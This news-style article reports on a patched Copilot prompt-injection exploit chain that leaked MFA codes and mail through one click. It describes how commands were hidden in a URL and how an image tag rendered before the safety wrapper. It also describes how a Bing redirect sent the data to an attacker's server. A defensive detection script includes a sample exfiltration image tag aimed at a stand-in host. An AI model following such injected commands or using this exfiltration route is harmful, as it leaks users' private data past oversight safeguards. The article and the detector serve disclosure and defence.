The Copilot Flaw That Exposed a Bigger AI Problem

One Click Was All It Took to Trick Copilot Into Leaking Your Secrets

Imagine clicking a normal-looking link in an email and, without typing a single word, handing over your two-factor codes, private messages, and work files to a stranger. That’s the scenario security researchers built to expose a serious weakness in Microsoft’s AI assistant, and it says a lot about how fragile the walls around private data really are.

  • A patched Copilot bug let attackers pull 2FA codes and business files with a single click.
  • The trick worked by hiding commands where Copilot couldn’t tell friend from foe.
  • The patch closed this hole, but the deeper flaw behind it stays open.

How the Attack Worked

Researchers at the security firm Varonis built an exploit chain they called SearchLeak. Varonis Threat Labs described it as a critical vulnerability chain in Microsoft 365 Copilot Enterprise that lets an attacker steal sensitive data, including MFA codes, email messages, and meeting details. The flaw is now tracked as CVE-2026-42824, and it was discovered and reported to Microsoft by the researchers. Microsoft patched it the week before the team went public.

The clever part is how little the victim had to do. The three-stage attack is now fixed, but it belongs to a new group of AI prompt-injection issues that hide commands inside URLs and other variables. The attacker emailed the target a specially built link. One click sent Copilot off to search the person’s own mailbox, grab sensitive content, and quietly ship it out. The victim never typed a prompt or approved anything.

Why the Guardrails Failed

Microsoft, like other AI providers, leans on a stack of safety rules to stop this kind of thing. One rule wraps Copilot’s output in code blocks so the browser treats it as plain text instead of live code. Another limits which websites Copilot is allowed to contact without a clear okay. While Copilot can freely send requests to Microsoft domains, those rules clamp down on requests to untrusted sites.

The exploit hopped over both. The researchers found that the text-wrapping protection only kicks in after Copilot finishes its “thinking” phase. Before that moment, Copilot builds its answer using raw HTML, which the browser renders for a split second. If that answer contains an image tag, the browser fires off a request to fetch the image right away. By the time the safety wrapper arrives, the request has already left the building.

That handled the timing problem. The website problem was solved with a workaround that used Bing as a middleman. Because Bing sits on Copilot’s approved list, the attack routed the stolen data through a Bing image-search URL, which then forwarded the request to a server the attacker controlled. The secret information landed neatly in that server’s logs.
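As an added illustration (not code from Varonis or Microsoft), here is a pre-render audit of assistant output that flags the two conditions the chain above combined: an image tag that would fire a request before the text wrapper arrives, and an allowlisted host whose query string carries a nested URL pointing somewhere else. The allowlist, the parameter name `u` and the host `collector.example` are constructed placeholders, not values from the report.

```python
import re
from html import escape
from urllib.parse import urlparse, parse_qs, unquote

# Hosts the assistant may contact without an explicit user okay. Assumption:
# the real allowlist is Microsoft's and is not described on the page.
ALLOWED_HOSTS = {"www.bing.com", "bing.com", "www.microsoft.com"}

IMG_SRC_RE = re.compile(r"""<img\b[^>]*\bsrc\s*=\s*['"]([^'"]+)['"]""", re.I)

def is_allowed(host: str) -> bool:
    return host.lower() in ALLOWED_HOSTS

def nested_external_urls(url: str) -> list[str]:
    """Absolute URLs inside the query string that point outside the allowlist:
    the trusted-host-as-middleman pattern."""
    found = []
    for values in parse_qs(urlparse(url).query).values():
        for v in values:
            inner = urlparse(unquote(v))
            if inner.scheme in ("http", "https") and inner.netloc and not is_allowed(inner.netloc):
                found.append(inner.geturl())
    return found

def audit_output(raw: str) -> list[dict]:
    """Flag every remote image fetch a browser would fire while rendering the
    raw (pre-wrapping) assistant output, and say why it is suspicious."""
    findings = []
    for src in IMG_SRC_RE.findall(raw):
        p = urlparse(src)
        if not p.netloc or p.scheme not in ("", "http", "https"):
            continue  # inline data: URIs and relative paths do not leave the page
        if not is_allowed(p.netloc):
            findings.append({"src": src, "reason": "image fetch to non-allowlisted host"})
        elif nested := nested_external_urls(src):
            findings.append({"src": src, "reason": "allowlisted host forwarding to " + ", ".join(nested)})
    return findings

def render_safe(raw: str) -> str:
    """Mitigation: escape model output before any of it reaches the browser, so an
    <img> tag is displayed as text and no request is ever made."""
    return "<pre>" + escape(raw) + "</pre>"

# Constructed sample: a response carrying an image tag whose src uses a trusted
# host and a placeholder parameter "u" (not a real Bing parameter) to forward elsewhere.
SAMPLE = ("Here are your results.\n"
          '<img src="https://www.bing.com/images/search?q=cat&u=https%3A%2F%2Fcollector.example%2Fp%3Fcode%3D123456">')
```

Running `audit_output(SAMPLE)` reports the trusted host forwarding to `collector.example`, while `render_safe(SAMPLE)` shows the same text with the tag neutralised.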

A Bug You Can Patch, a Flaw You Can’t

Microsoft fixed the specific holes that SearchLeak abused. The harder issue is the one underneath. Large language models can’t reliably tell the difference between a real instruction from you and a fake one hidden inside content they’re reading. An email, a web page, or a sneaky query string can all carry commands that the model treats as legitimate.

That gullibility is why these tools keep needing patch after patch. Each fix blocks a known path, but the root weakness stays put, so researchers and attackers keep finding fresh ways around the latest set of rules. Protecting private data through AI assistants is an ongoing job, not a one-time fix, and that’s exactly the lesson here.

The stakes climb fast in a business setting. SearchLeak targets Microsoft 365 Copilot Enterprise, which means a successful attack could reach far past one person’s inbox into meeting notes, SharePoint documents, OneDrive files, and other indexed company content. Depending on how an organization wires up its systems, the reach could stretch even further.

What Smart Teams Should Do Next

The practical message is simple. Treat AI assistants as helpful but easily fooled coworkers, not as locked vaults. Limit what each account can actually see, since an assistant can only leak data the user already has access to. Be cautious with links, even ones that appear to come from trusted Microsoft domains. And keep an eye on vendor updates, because the patch cycle for these tools is going to stay busy.

AI assistants are useful, and they’re not going anywhere. The challenge is building real boundaries around the private information they touch, so a single click can’t quietly turn a productivity tool into a leak. Until models can tell a genuine command from a planted one, careful access controls and a healthy dose of skepticism are your best defense.
